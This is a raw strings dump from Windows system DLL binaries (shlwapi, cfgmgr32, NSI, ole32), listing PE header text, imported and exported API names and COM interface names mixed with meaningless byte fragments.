shlwapi.StrRStrIW StrSpnA shlwapi.StrSpnA StrSpnW shlwapi.StrSpnW StrStrA shlwapi.StrStrA StrStrIA shlwapi.StrStrIA StrStrIW shlwapi.StrStrIW StrStrNIW shlwapi.StrStrNIW StrStrNW shlwapi.StrStrNW StrStrW shlwapi.StrStrW StrToInt64ExA shlwapi.StrToInt64ExA StrToInt64ExW shlwapi.StrToInt64ExW StrToIntA shlwapi.StrToIntA StrToIntExA shlwapi.StrToIntExA StrToIntExW shlwapi.StrToIntExW StrToIntW shlwapi.StrToIntW StrTrimA shlwapi.StrTrimA StrTrimW shlwapi.StrTrimW UrlApplySchemeW shlwapi.UrlApplySchemeW UrlCanonicalizeW shlwapi.UrlCanonicalizeW UrlCombineA shlwapi.UrlCombineA UrlCombineW shlwapi.UrlCombineW UrlCreateFromPathW shlwapi.UrlCreateFromPathW UrlEscapeW shlwapi.UrlEscapeW UrlFixupW shlwapi.UrlFixupW UrlGetLocationW shlwapi.UrlGetLocationW UrlGetPartW shlwapi.UrlGetPartW UrlIsW shlwapi.UrlIsW UrlUnescapeA shlwapi.UrlUnescapeA UrlUnescapeW shlwapi.UrlUnescapeW !This program cannot be run in DOS mode. ORich .text `.data .rsrc @.reloc msvcrt.dll ntdll.dll RPCRT4.dll ADVAPI32.dll KERNEL32.dll qw"Vqwf qwPr FqwR qwPPCH HuHQ VW9E uh`X uhXX @_^[] u 9u 95d0 u95T0 9=t0 uu,9= F95p0 QQV3 j{Xf j-Xf j-Xf F$j-Xf F.j-Xf FHXf FL^[_] tFSP PhbR wHW3 f99t AAJu vJf ,t>f f9>t v f @@f98u j_Yf wUE{O #+j_P _^[] _^[] | 9] | 8] | 8] j\Xf _^[t SVW3 _^[] SVW3 _^[] j\_f; u:f9 1f9^ t$j\XVf uA9] VhP4 QRPh API-MS-WIN-Service-winsvc-L1-1-0.dll API-MS-WIN-Service-Management-L2-1-0.dll API-MS-Win-Security-SDDL-L1-1-0.dll QueryServiceStatus I_ScPnPGetServiceName QueryServiceStatusEx ConvertSecurityDescriptorToStringSecurityDescriptorW ConvertStringSecurityDescriptorToSecurityDescriptorW KERNEL32.dll ADVAPI32.dll RPCRT4.dll ntdll.dll msvcrt.dll wcschr _wcsicmp _resetstkoflw wcsrchr _wcsnicmp _vsnwprintf memcpy memmove _XcptFilter malloc free _initterm _amsg_exit _except_handler4_common memset RtlMultiByteToUnicodeSize RtlMultiByteToUnicodeN RtlUnicodeToMultiByteSize RtlUnicodeToMultiByteN RtlInitUnicodeString RtlUpcaseUnicodeString RtlNtStatusToDosError EtwTraceMessage RtlGetOwnerSecurityDescriptor RtlGetGroupSecurityDescriptor RtlGetSaclSecurityDescriptor RtlGetDaclSecurityDescriptor RtlStringFromGUID RtlFreeUnicodeString RtlCompareUnicodeString RtlPrefixUnicodeString RtlGUIDFromString NdrAsyncClientCall NdrClientCall2 RpcStringBindingComposeW RpcBindingFromStringBindingW RpcStringFreeW RpcAsyncInitializeHandle RpcAsyncCompleteCall I_RpcExceptionFilter RpcBindingFree GetKernelObjectSecurity DuplicateTokenEx SetThreadToken AdjustTokenPrivileges OpenThreadToken OpenProcessToken AllocateAndInitializeSid IsValidSid SetEntriesInAclW InitializeSecurityDescriptor SetSecurityDescriptorOwner SetSecurityDescriptorGroup SetSecurityDescriptorDacl SetSecurityDescriptorControl IsValidSecurityDescriptor GetSecurityDescriptorLength MakeSelfRelativeSD FreeSid OpenSCManagerW OpenServiceW CloseServiceHandle RegDeleteTreeW RegDeleteValueW RegQueryValueExW RegSetValueExW RegConnectRegistryW RegOpenKeyExW RegCloseKey RegCreateKeyExW CloseHandle WaitForSingleObjectEx CreateEventW LocalFree GetCurrentProcessId CompareStringOrdinal LocalAlloc DeleteCriticalSection InitializeCriticalSection DisableThreadLibraryCalls Sleep GetLastError GetComputerNameExW SetLastError WaitForMultipleObjectsEx OpenEventW ReleaseMutex LeaveCriticalSection EnterCriticalSection CompareStringW DelayLoadFailureHook GetProcAddress FreeLibrary InterlockedCompareExchange LoadLibraryExA InterlockedExchange QueryPerformanceCounter GetTickCount GetCurrentThreadId GetSystemTimeAsFileTime TerminateProcess GetCurrentProcess UnhandledExceptionFilter SetUnhandledExceptionFilter RegDeleteKeyExW FileTimeToSystemTime lstrcmpiW lstrlenW HeapAlloc HeapReAlloc HeapFree GetProcessHeap LCMapStringW UnmapViewOfFile GetThreadLocale RaiseException GetCurrentThread MultiByteToWideChar lstrlenA CreateMutexW SetEvent GetSystemWindowsDirectoryW SetFilePointer MapViewOfFile CreateFileMappingW SetEndOfFile CreateDirectoryW GetFileAttributesW GetFullPathNameW RSDS cfgmgr32.pdb !This program cannot be run in DOS mode. RichR58 .text `.data .rsrc @.reloc KERNEL32.dll NTDLL.DLL GDI32.dll USER32.dll msvcrt.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll KERNELBASE.dll qwgXpw qwn) qwNVrwE -qw2 qwynqw qwo/ Wqw( qwEWqw) qw'Wqw\ qwJSrw qw/Fqwr Urw/ qwtNrw rwfnrw rw%-qwy Nrwi qw2zswl pw5Yqw Uqw:Vqwf Bqw{ qw/TqwT qw f9>u AABB _^[] u_^[] u79U @@f9 t%SV ^[_] GGFFf toWV 7FFC |"S3 tEf9 @@Nu Ht 9~ _^[] t1VW |.f9 |2PPPP f98u j\j/ t!9U |,VWS | VWS _^[] f9;tT CCf9;u tP9] QSV3 7_^[ u;h8$ H4^] t j/ Pj#j? Sj#j? QSVW @_^] j@h8$ _^[] tBf;E tu# 98u' t!WWWj |*SV } QP u_^] j{Yf j}Yf _^[] $WVj j@VW AABB tQ9] QSVW 7_^] O(hHj Aj:f j\Yf AACCN _^[] v f93 t ;M t 9U \t*f /t$f :t;GG j\Xf;B _^[] %>KH #_4H \[&v`G: WaQ- XIk|N 43?Z .%2F i8pI C7L1c 3>"w 9@ip {_Z$ e&8e :~?+ 5}*9 Wh,# SHLWAPI.dll AssocCreate AssocGetPerceivedType AssocIsDangerous AssocQueryKeyA AssocQueryKeyW AssocQueryStringA AssocQueryStringByKeyA AssocQueryStringByKeyW AssocQueryStringW ChrCmpIA ChrCmpIW ColorAdjustLuma ColorHLSToRGB ColorRGBToHLS ConnectToConnectionPoint DelayLoadFailureHook DllGetVersion GetAcceptLanguagesA GetAcceptLanguagesW GetMenuPosFromID HashData IStream_Copy IStream_Read IStream_ReadPidl IStream_ReadStr IStream_Reset IStream_Size IStream_Write IStream_WritePidl IStream_WriteStr IUnknown_AtomicRelease IUnknown_GetSite IUnknown_GetWindow IUnknown_QueryService IUnknown_Set IUnknown_SetSite IntlStrEqWorkerA IntlStrEqWorkerW IsCharSpaceA IsCharSpaceW IsInternetESCEnabled IsOS MLFreeLibrary MLLoadLibraryA MLLoadLibraryW ParseURLA ParseURLW PathAddBackslashA PathAddBackslashW PathAddExtensionA PathAddExtensionW PathAppendA PathAppendW PathBuildRootA PathBuildRootW PathCanonicalizeA PathCanonicalizeW PathCombineA PathCombineW PathCommonPrefixA PathCommonPrefixW PathCompactPathA PathCompactPathExA PathCompactPathExW PathCompactPathW PathCreateFromUrlA PathCreateFromUrlAlloc PathCreateFromUrlW PathFileExistsA PathFileExistsW PathFindExtensionA PathFindExtensionW PathFindFileNameA PathFindFileNameW PathFindNextComponentA PathFindNextComponentW PathFindOnPathA PathFindOnPathW PathFindSuffixArrayA PathFindSuffixArrayW PathGetArgsA PathGetArgsW PathGetCharTypeA PathGetCharTypeW PathGetDriveNumberA PathGetDriveNumberW PathIsContentTypeA PathIsContentTypeW PathIsDirectoryA PathIsDirectoryEmptyA PathIsDirectoryEmptyW PathIsDirectoryW PathIsFileSpecA PathIsFileSpecW PathIsLFNFileSpecA PathIsLFNFileSpecW PathIsNetworkPathA PathIsNetworkPathW PathIsPrefixA PathIsPrefixW PathIsRelativeA PathIsRelativeW PathIsRootA PathIsRootW PathIsSameRootA PathIsSameRootW PathIsSystemFolderA PathIsSystemFolderW PathIsUNCA PathIsUNCServerA PathIsUNCServerShareA PathIsUNCServerShareW PathIsUNCServerW PathIsUNCW PathIsURLA PathIsURLW PathMakePrettyA PathMakePrettyW PathMakeSystemFolderA PathMakeSystemFolderW PathMatchSpecA PathMatchSpecExA PathMatchSpecExW PathMatchSpecW PathParseIconLocationA PathParseIconLocationW PathQuoteSpacesA PathQuoteSpacesW PathRelativePathToA PathRelativePathToW PathRemoveArgsA PathRemoveArgsW PathRemoveBackslashA PathRemoveBackslashW PathRemoveBlanksA PathRemoveBlanksW PathRemoveExtensionA PathRemoveExtensionW PathRemoveFileSpecA PathRemoveFileSpecW PathRenameExtensionA PathRenameExtensionW PathSearchAndQualifyA PathSearchAndQualifyW PathSetDlgItemPathA PathSetDlgItemPathW PathSkipRootA PathSkipRootW PathStripPathA PathStripPathW PathStripToRootA PathStripToRootW PathUnExpandEnvStringsA PathUnExpandEnvStringsW PathUndecorateA PathUndecorateW PathUnmakeSystemFolderA PathUnmakeSystemFolderW PathUnquoteSpacesA PathUnquoteSpacesW QISearch SHAllocShared SHAnsiToAnsi SHAnsiToUnicode SHAutoComplete SHCopyKeyA SHCopyKeyW SHCreateMemStream SHCreateShellPalette SHCreateStreamOnFileA SHCreateStreamOnFileEx SHCreateStreamOnFileW SHCreateStreamWrapper SHCreateThread SHCreateThreadRef SHCreateThreadWithHandle SHDeleteEmptyKeyA SHDeleteEmptyKeyW SHDeleteKeyA SHDeleteKeyW SHDeleteOrphanKeyA SHDeleteOrphanKeyW SHDeleteValueA SHDeleteValueW SHEnumKeyExA SHEnumKeyExW SHEnumValueA SHEnumValueW SHFormatDateTimeA SHFormatDateTimeW SHFreeShared SHGetInverseCMAP SHGetThreadRef SHGetValueA SHGetValueW SHGetViewStatePropertyBag SHIsChildOrSelf SHIsLowMemoryMachine SHLoadIndirectString SHLockShared SHMessageBoxCheckA SHMessageBoxCheckW SHOpenRegStream2A SHOpenRegStream2W SHOpenRegStreamA SHOpenRegStreamW SHPropertyBag_ReadStrAlloc SHPropertyBag_WriteBSTR SHQueryInfoKeyA SHQueryInfoKeyW SHQueryValueExA SHQueryValueExW SHRegCloseUSKey SHRegCreateUSKeyA SHRegCreateUSKeyW SHRegDeleteEmptyUSKeyA SHRegDeleteEmptyUSKeyW SHRegDeleteUSValueA SHRegDeleteUSValueW SHRegDuplicateHKey SHRegEnumUSKeyA SHRegEnumUSKeyW SHRegEnumUSValueA SHRegEnumUSValueW SHRegGetBoolUSValueA SHRegGetBoolUSValueW SHRegGetIntW SHRegGetPathA SHRegGetPathW SHRegGetUSValueA SHRegGetUSValueW SHRegGetValueA SHRegGetValueW SHRegOpenUSKeyA SHRegOpenUSKeyW SHRegQueryInfoUSKeyA SHRegQueryInfoUSKeyW SHRegQueryUSValueA SHRegQueryUSValueW SHRegSetPathA SHRegSetPathW SHRegSetUSValueA SHRegSetUSValueW SHRegWriteUSValueA SHRegWriteUSValueW SHRegisterValidateTemplate SHReleaseThreadRef SHRunIndirectRegClientCommand SHSendMessageBroadcastA SHSendMessageBroadcastW SHSetThreadRef SHSetValueA SHSetValueW SHSkipJunction SHStrDupA SHStrDupW SHStripMneumonicA SHStripMneumonicW SHUnicodeToAnsi SHUnicodeToUnicode SHUnlockShared ShellMessageBoxA ShellMessageBoxW StrCSpnA StrCSpnIA StrCSpnIW StrCSpnW StrCatBuffA StrCatBuffW StrCatChainW StrCatW StrChrA StrChrIA StrChrIW StrChrNIW StrChrNW StrChrW StrCmpCA StrCmpCW StrCmpICA StrCmpICW StrCmpIW StrCmpLogicalW StrCmpNA StrCmpNCA StrCmpNCW StrCmpNIA StrCmpNICA StrCmpNICW StrCmpNIW StrCmpNW StrCmpW StrCpyNW StrCpyW StrDupA StrDupW StrFormatByteSize64A StrFormatByteSizeA StrFormatByteSizeEx StrFormatByteSizeW StrFormatKBSizeA StrFormatKBSizeW StrFromTimeIntervalA StrFromTimeIntervalW StrIsIntlEqualA StrIsIntlEqualW StrNCatA StrNCatW StrPBrkA StrPBrkW StrRChrA StrRChrIA StrRChrIW StrRChrW StrRStrIA StrRStrIW StrRetToBSTR StrRetToBufA StrRetToBufW StrRetToStrA StrRetToStrW StrSpnA StrSpnW StrStrA StrStrIA StrStrIW StrStrNIW StrStrNW StrStrW StrToInt64ExA StrToInt64ExW StrToIntA StrToIntExA StrToIntExW StrToIntW StrTrimA StrTrimW UrlApplySchemeA UrlApplySchemeW UrlCanonicalizeA UrlCanonicalizeW UrlCombineA UrlCombineW UrlCompareA UrlCompareW UrlCreateFromPathA UrlCreateFromPathW UrlEscapeA UrlEscapeW UrlFixupW UrlGetLocationA UrlGetLocationW UrlGetPartA UrlGetPartW UrlHashA UrlHashW UrlIsA UrlIsNoHistoryA UrlIsNoHistoryW UrlIsOpaqueA UrlIsOpaqueW UrlIsW UrlUnescapeA UrlUnescapeW WhichPlatform wnsprintfA wnsprintfW wvnsprintfA wvnsprintfW SHUNIMPL.#UNIMPL_SHCreateStreamWrapper user32.IsCharAlphaW user32.IsCharUpperW user32.IsCharLowerW user32.IsCharAlphaNumericW USER32.AppendMenuW USER32.CallWindowProcW USER32.CharLowerW USER32.CharLowerBuffW USER32.CharNextW USER32.CharPrevW USER32.CharToOemW USER32.CharUpperW USER32.CharUpperBuffW KERNEL32.CompareStringW USER32.CopyAcceleratorTableW USER32.CreateAcceleratorTableW GDI32.CreateDCW USER32.CreateDialogParamW KERNEL32.CreateDirectoryW KERNEL32.CreateEventW KERNEL32.CreateFileW GDI32.CreateFontIndirectW GDI32.CreateICW USER32.CreateWindowExW USER32.DefWindowProcW KERNEL32.DeleteFileW USER32.DialogBoxIndirectParamW USER32.DialogBoxParamW USER32.DispatchMessageW USER32.DrawTextW GDI32.EnumFontFamiliesW GDI32.EnumFontFamiliesExW KERNEL32.EnumResourceNamesW KERNEL32.FindFirstFileW KERNEL32.FindResourceW USER32.FindWindowW KERNEL32.FormatMessageW USER32.GetClassInfoW USER32.GetClassLongW USER32.GetClassNameW USER32.GetClipboardFormatNameW KERNEL32.GetCurrentDirectoryW USER32.GetDlgItemTextW KERNEL32.GetFileAttributesW KERNEL32.GetFullPathNameW KERNEL32.GetLocaleInfoW USER32.GetMenuStringW USER32.GetMessageW KERNEL32.GetModuleFileNameW KERNEL32.GetSystemDirectoryW KERNEL32.SearchPathW KERNEL32.GetModuleHandleW GDI32.GetObjectW KERNEL32.GetPrivateProfileIntW KERNEL32.GetProfileStringW USER32.GetPropW KERNEL32.GetStringTypeExW KERNEL32.GetTempFileNameW KERNEL32.GetTempPathW GDI32.GetTextExtentPoint32W GDI32.GetTextFaceW GDI32.GetTextMetricsW USER32.GetWindowLongW USER32.GetWindowTextW USER32.GetWindowTextLengthW KERNEL32.GetWindowsDirectoryW USER32.InsertMenuW USER32.IsDialogMessageW USER32.LoadAcceleratorsW USER32.LoadBitmapW USER32.LoadCursorW USER32.LoadIconW USER32.LoadImageW KERNEL32.LoadLibraryExW USER32.LoadMenuW USER32.LoadStringW USER32.MessageBoxIndirectW USER32.ModifyMenuW GDI32.GetCharWidth32W GDI32.GetCharacterPlacementW KERNEL32.CopyFileW KERNEL32.MoveFileW USER32.OemToCharW KERNEL32.OutputDebugStringW USER32.PeekMessageW USER32.PostMessageW USER32.PostThreadMessageW USER32.RegisterClassW USER32.RegisterClipboardFormatW USER32.RegisterWindowMessageW USER32.RemovePropW USER32.SendDlgItemMessageW USER32.SendMessageW KERNEL32.SetCurrentDirectoryW USER32.SetDlgItemTextW USER32.SetMenuItemInfoW USER32.SetPropW USER32.SetWindowLongW USER32.SetWindowsHookExW USER32.SetWindowTextW GDI32.StartDocW USER32.SystemParametersInfoW USER32.TranslateAcceleratorW USER32.UnregisterClassW USER32.VkKeyScanW USER32.WinHelpW USER32.wvsprintfW KERNEL32.CompareStringW SHUNIMPL.#246 SHUNIMPL.#243 SHUNIMPL.#139 SHUNIMPL.#140 SHUNIMPL.#141 SHUNIMPL.#244 SHUNIMPL.#245 SHUNIMPL.#142 SHUNIMPL.#143 SHUNIMPL.#144 SHUNIMPL.#145 SHUNIMPL.#146 SHUNIMPL.#147 SHUNIMPL.#148 SHUNIMPL.#149 SHUNIMPL.#150 SHUNIMPL.#152 SHUNIMPL.#153 SHUNIMPL.#154 SHUNIMPL.#155 SHUNIMPL.#156 SHUNIMPL.#157 SHUNIMPL.#158 SHUNIMPL.#159 SHUNIMPL.#160 SHUNIMPL.#161 SHUNIMPL.#162 SHUNIMPL.#163 SHUNIMPL.#164 SHUNIMPL.#316 SHUNIMPL.#317 SHUNIMPL.#240 WINMM.PlaySoundW SHUNIMPL.#247 SHUNIMPL.#165 SHUNIMPL.#314 SHUNIMPL.#315 KERNEL32.WritePrivateProfileStringW GDI32.ExtTextOutW GDI32.CreateFontW USER32.DrawTextExW USER32.GetMenuItemInfoW USER32.InsertMenuItemW GDI32.CreateMetaFileW KERNEL32.CreateMutexW KERNEL32.ExpandEnvironmentStringsW KERNEL32.CreateSemaphoreW KERNEL32.IsBadStringPtrW KERNEL32.LoadLibraryW KERNEL32.GetTimeFormatW KERNEL32.GetDateFormatW KERNEL32.GetPrivateProfilV 9y tB QRPh0 |KVW3 VRRQPS 0w(;>w$W j<_; QPh`X uhHY PSSW tDHu9h u 9w$ 1.3.6.1.4.1.311.2.1.12 t#WV uhH` u 9V tf9>u _^[] @SV" |hSV3 j.Zf j Xf; NN;u GGf9 u@PV f9\B u f9 Ph`v Wh`v PSWV F;s4 VhL: v Ph N0QP QPSS jBPW txh$& PWVj @f;E u)f98t" uWQP Phpv r ;K PWWhDm u 9} t=VW3 t~9u tIh` PVSj PVSW t=j V t1WV "C_^ t(j\V QVPj HHtD t:HHt [u<; v8VW u@PSV ^[_] SVu j\@P u 9^ utAj SSSS SSSS _^[] E$SVW u 9V 9U$u 9U$u 9U$tJ; t8RV jxX_^[ uGVVVV PVVV VVSW Ph@@) PhD@) PhL@) tHVVVP 3Vh`v Wh`v tzjP tYjP u(PW |KSV LSWV RhXx RhXx uQ@P BSSSS ujWYf ujWYj SWVf SPWV u 9^ t_SV t.SS u69] t1SV u&9] jWX_^[] QSPSh u%9] t SVS uSQP uSQP t"9_ jW^_ =SVj PPPP AABB PPPP Wj Y AddInternetPropertySheetsEx inetcpl.cpl |nSWh E ;E$ }$} u(WV E ;E$ sTj;V t>;} 4t8HtCHHt? uf;U QRPhP QRPhp TaskDialogIndirect uhP+ 95P+ PropertySheetA _^[] HtSHt QRPh0 QRPh QRPh MPR.dll urlmon.dll SHELL32.dll PROPSYS.dll API-MS-Win-Security-SDDL-L1-1-0.dll ADVAPI32.dll ole32.dll apphelp.dll CRYPT32.dll WINTRUST.dll OLEAUT32.dll msiltcfg.dll SETUPAPI.dll USERENV.dll VERSION.dll slc.dll wkscli.dll netutils.dll WNetGetResourceInformationA WNetGetResourceInformationW CreateFormatEnumerator RegisterFormatEnumerator SHCreateItemFromIDList SHGetDesktopFolder SHGetDataFromIDListW SHGetInstanceExplorer SHEvaluateSystemCommandTemplate ShellExecuteExW SHParseDisplayName SHBindToParent SHChangeNotify PSPropertyBag_ReadPOINTS PSPropertyBag_WritePOINTS PSPropertyBag_ReadRECTL PSPropertyBag_WriteRECTL PSPropertyBag_ReadStream PSPropertyBag_WriteStream PSPropertyBag_ReadUnknown PSPropertyBag_WriteUnknown PSPropertyBag_Delete PSPropertyBag_ReadGUID PSPropertyBag_WriteGUID PSPropertyBag_ReadPropertyKey PSPropertyBag_WritePropertyKey PSGetPropertyKeyFromName InitPropVariantFromStringAsVector PSPropertyBag_WritePOINTL PropVariantToStringAlloc PSGetPropertyDescription PropVariantChangeType VariantToPropVariant PropVariantToVariant PSPropertyBag_ReadPOINTL PSPropertyBag_WriteBOOL PSPropertyBag_ReadBOOL PSPropertyBag_WriteULONGLONG PSPropertyBag_ReadULONGLONG PSPropertyBag_WriteDWORD PSPropertyBag_ReadDWORD PSPropertyBag_WriteLONG PSPropertyBag_ReadLONG PSPropertyBag_WriteSHORT PSPropertyBag_ReadSHORT PSPropertyBag_WriteInt PSPropertyBag_ReadInt PSPropertyBag_WriteBSTR PSPropertyBag_WriteStr PSPropertyBag_ReadStrAlloc PSPropertyBag_ReadStr PSPropertyBag_ReadBSTR PSPropertyBag_ReadType PropVariantToBSTR PSCreateMemoryPropertyStore ConvertStringSecurityDescriptorToSecurityDescriptorW ConvertSidToStringSidW RegEnumKeyW SaferiIsExecutableFileType RegQueryValueW GetCurrentHwProfileW SaferiSearchMatchingHashRules OpenThreadToken RegSetValueW GetUserNameW RegEnumKeyA AdjustTokenPrivileges OpenProcessToken CheckTokenMembership GetTokenInformation GetSidSubAuthority CoCreateInstance CoTaskMemFree CoUninitialize CreateBindCtx PropVariantClear CoGetMalloc CoTaskMemAlloc CoInitializeEx OleInitialize OleUninitialize CLSIDFromString CLSIDFromProgID CoWaitForMultipleHandles ApphelpCheckShellObject CertGetNameStringW CertFindCertificateInStore CertCloseStore CertOpenStore CertGetEnhancedKeyUsage CertOIDToAlgId CertDuplicateCertificateContext CertFreeCertificateContext CertVerifyCertificateChainPolicy CryptDecodeObject CertGetCertificateContextProperty CryptCATAdminAcquireContext CryptCATAdminReleaseContext WinVerifyTrust CryptCATAdminEnumCatalogFromHash CryptCATCatalogInfoFromContext CryptCATAdminReleaseCatalogContext WTHelperGetFileHash CryptCATAdminCalcHashFromFileHandle WTHelperProvDataFromStateData WTHelperGetProvSignerFromChain SetupDiDestroyDeviceInfoList SetupDiGetDeviceInterfaceDetailW SetupDiEnumDeviceInterfaces SetupDiGetClassDevsW ExpandEnvironmentStringsForUserW ExpandEnvironmentStringsForUserA GetFileVersionInfoSizeA VerQueryValueA VerQueryValueW GetFileVersionInfoW GetFileVersionInfoA GetFileVersionInfoByHandle GetFileVersionInfoSizeW SLGetWindowsInformationDWORD NetGetJoinInformation NetApiBufferFree KERNELBASE.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll msvcrt.dll ntdll.dll USER32.dll GDI32.dll KERNEL32.dll ReleaseSRWLockExclusive TlsSetValue TlsGetValue GetTickCount GetCurrentThread LoadLibraryW InterlockedIncrement FreeLibraryAndExitThread SetEvent IsWow64Process WaitForSingleObject CreateThread CreateEventA GetModuleHandleExA GetUserDefaultUILanguage InterlockedDecrement MulDiv LCIDToLocaleName GetUserDefaultLCID HeapAlloc GetProcessHeap HeapFree InterlockedExchange GetModuleFileNameA GetVersionExW OpenEventW GetSystemDefaultUILanguage GetSystemWindowsDirectoryW GetModuleFileNameW WriteFile LockFileEx UnlockFileEx ReadFile DeleteFileW SetFileInformationByHandle ReplaceFileW GetFileInformationByHandleEx GetVolumeInformationByHandleW SetFilePointerEx SetFilePointer SetEndOfFile LocalSize OpenProcess DuplicateHandle GetCurrentProcessId GlobalAddAtomW GlobalGetAtomNameW MapViewOfFile CreateFileMappingA GlobalDeleteAtom DeleteTimerQueueTimer CreateTimerQueueTimer QueueUserWorkItem ReleaseSRWLockShared AcquireSRWLockShared GetPrivateProfileStringA GetPrivateProfileStringW WritePrivateProfileStringW GetModuleHandleExW FormatMessageW GetLocaleInfoW SizeofResource LockResource LoadResource FindResourceW CreateFileMappingW OpenFileMappingW GetModuleHandleW FormatMessageA AcquireSRWLockExclusive InitializeSRWLock GetCurrentProcess GetModuleHandleA LoadLibraryA UnmapViewOfFile TlsFree DisableThreadLibraryCalls TlsAlloc LoadLibraryExW LocalReAlloc MultiByteToWideChar WideCharToMultiByte DeviceIoControl ExpandEnvironmentStringsW CompareStringW LCMapStringW FindFirstFileW FindNextFileW SetFileAttributesW CreateFileW GetWindowsDirectoryW GetSystemDirectoryW SearchPathW GetFullPathNameW lstrcmpW lstrcmpiW GetFileAttributesW GetEnvironmentVariableW lstrlenW GetCurrentThreadId ExpandEnvironmentStringsA CompareStringA GetEnvironmentVariableA SetLastError LocalFree LocalAlloc LCMapStringA SetFileAttributesA GetSystemTimeAsFileTime CreateFileA GetProcAddress GetLastError FreeLibrary InterlockedCompareExchange LoadLibraryExA IsDBCSLeadByte GetCPInfo GetFileAttributesA SetErrorMode lstrcmpiA lstrcmpA DelayLoadFailureHook lstrlenA GetFullPathNameA SearchPathA FindClose FindNextFileA FindFirstFileA GetSystemDirectoryA GetWindowsDirectoryA CloseHandle SetFileTime CreateActCtxW ReleaseActCtx ActivateActCtx DeactivateActCtx Sleep QueryPerformanceCounter TerminateProcess UnhandledExceptionFilter SetUnhandledExceptionFilter GetLayout ExtTextOutW GetTextExtentPoint32W SetStretchBltMode CreateSolidBrush GetStockObject SetMapMode Rectangle StretchDIBits SelectPalette RealizePalette CreateDIBSection GetDIBits GetObjectA CreateFontIndirectA SetBkColor GetDeviceCaps CreateHalftonePalette GetPaletteEntries DeleteObject CreateCompatibleDC GetSystemPaletteEntries CreatePalette DeleteDC GetTextExtentPointW GetGlyphIndicesW SelectObject GetTextExtentPointA GetGlyphIndicesA GetTextExtentExPointI RegisterClassA GetClassInfoA RegisterClassW GetClassInfoW UnregisterClassA UnregisterClassW PeekMessageA MsgWaitForMultipleObjects IsChild SetPropA SystemParametersInfoA RemovePropA SendNotifyMessageA SendNotifyMessageW PostThreadMessageA DispatchMessageA TranslateMessage GetMessageA ActivateKeyboardLayout GetKeyboardLayout IsDlgButtonChecked EndDialog DialogBoxParamW DialogBoxParamA CreateWindowExA LoadCursorA SetWindowLongW CreateWindowExW GetIconInfo GetSysColor RegisterClipboardFormatA CharLowerW IsCharAlphaNumericW CharNextW CheckMenuItem CreatePopupMenu GetMenuItemCount GetMenuItemInfoA DefWindowProcW DefWindowProcA IsWindowUnicode PostMessageW PostMessageA EnumChildWindows LoadMenuW GetSubMenu RemoveMenu DestroyMenu GetParent SetParent GetWindowLongA SetWindowLongA GetMenuDefaultItem EnableMenuItem LoadStringW GetWindowTextW GetPropW GetSystemMetrics CharUpperW SendMessageW SetWindowTextW CharPrevW LoadStringA GetWindowTextA GetPropA MessageBoxW CharUpperA GetDlgItem GetClientRect SendMessageA SetWindowTextA GetDC ReleaseDC CharPrevA CharNextA GetWindowThreadProcessId _wcsicmp NtQueryInformationProcess _chkstk EtwEventUnregister EtwEventRegister EtwUnregisterTraceGuids EtwRegisterTraceGuidsW EtwGetTraceLoggerHandle EtwGetTraceEnableLevel EtwGetTraceEnableFlags _allmul EtwEventEnabled EtwEventWrite EtwTraceMessage wcschr iswalpha _vsnwprintf memcpy _vsnprintf _strnicmp memmove isalpha memset _unlock _except_handler4_common _onexit _lock __dllonexit _XcptFilter _amsg_exit _initterm free malloc RegOpenKeyExA RegQueryInfoKeyA RegDeleteKeyExA RegCreateKeyExA RegCloseKey RegQueryValueExA RegSetValueExA RegDeleteValueA RegCreateKeyExW RegOpenKeyExW RegEnumKeyExW RegSetValueExW RegDeleteKeyExW RegQueryInfoKeyW RegDeleteValueW RegQueryValueExW RegEnumValueW RegEnumKeyExA RegEnumValueA RegOpenCurrentUser RegGetValueW LoadStringByReference RSDS shlwapi.pdb Windows Shell true 33333333 wwwww7 wwwww wwwww wwww7 wwwww wwww7 wwwws3 wwwwwp wwwwws wwwwws wwwwws wwwwwws wwww !This program cannot be run in DOS mode. ?TRich .text `.data .rsrc @.reloc NSI.dll NsiAllocateAndGetPersistentDataWithMaskTable NsiAllocateAndGetTable NsiCancelChangeNotification NsiDeregisterChangeNotification NsiDeregisterChangeNotificationEx NsiEnumerateObjectsAllParameters NsiEnumerateObjectsAllParametersEx NsiEnumerateObjectsAllPersistentParametersWithMask NsiFreePersistentDataWithMaskTable NsiFreeTable NsiGetAllParameters NsiGetAllParametersEx NsiGetAllPersistentParametersWithMask NsiGetObjectSecurity NsiGetParameter NsiGetParameterEx NsiRegisterChangeNotification NsiRegisterChangeNotificationEx NsiRequestChangeNotification NsiRequestChangeNotificationEx NsiSetAllParameters NsiSetAllParametersEx NsiSetAllPersistentParametersWithMask NsiSetObjectSecurity NsiSetParameter NsiSetParameterEx QQSWj WWWW PWWS Qj!~w^!~w[ G{wtG{w 9}w~*}w 4|w5@}w <}w&> }w#{{w Z}wC3}w !}w86}w |wu(}w ~wqN}w woF}w o{w~ ~}sw Uqw:Vqw5Yqw uwynqwN pwH+qw< pwA+qw Vqwl ow$1pw WhichService D$$P D$ f SVWP t*VVVV WWWW SVW3 VVVVVVh ~0_[^ Wj'V QhL= QSVWh PPPPPVh @SVW tB9{ 9>v/ j0VP 9=`s uh@% uh@% PRQV SSSS u(f9} Ht&H HtGH PVhu Vj8hP @_^[ tjSVP _^[] t,9~ u)9~@t$ uVhh ~$_3 _^[] QhL= d:\w7rtm\com\ole32\com\dcomrem\coapi.cxx _[^] uSP3 tR9p uhPz SVWh ?STRMu _[^] PPWh t SV _^[] SVWh us;E IISV 9F$t= 9^ t> CoMarshalInterface FIEnumSTATPROPSETSTG IPropertySetStorage IEnumSTATPROPSTG IDummyHICONIncluder IFillInfo AsyncIPipeDouble IPipeDouble AsyncIPipeLong IPipeLong AsyncIPipeByte IPipeByte IROTData ITimeAndNoticeControl IProgressNotify ISystemActivator IDirectWriterLock IEnumConnections IConnectionPoint IEnumConnectionPoints IConnectionPointContainer IBlockingLock IDocfileAsyncConnectionPoint IPrivDragDrop IProcessInitControl AsyncIAdviseSink2 AsyncIAdviseSink AsyncIRemUnknown2 IRemUnknown2 IDLLHost IClassActivator AsyncIRemUnknownN IRemUnknownN ISCMLocalActivator IInterfaceFromWindowProp IOplockStorage AsyncIRundown IRundown ILocalSystemActivator AsyncIRemUnknown IRemUnknown ISequentialStream ISynchronize IContinue IOleCacheControl IOleCache2 IViewObject2 IRunnableObject IUrlMon IAdviseSink2 IDropTarget ISurrogate IOleCache IOleLink IOleItemContainer IOleContainer IParseDisplayName IOleInPlaceSite IOleClientSite IOleInPlaceActiveObject IOleInPlaceFrame 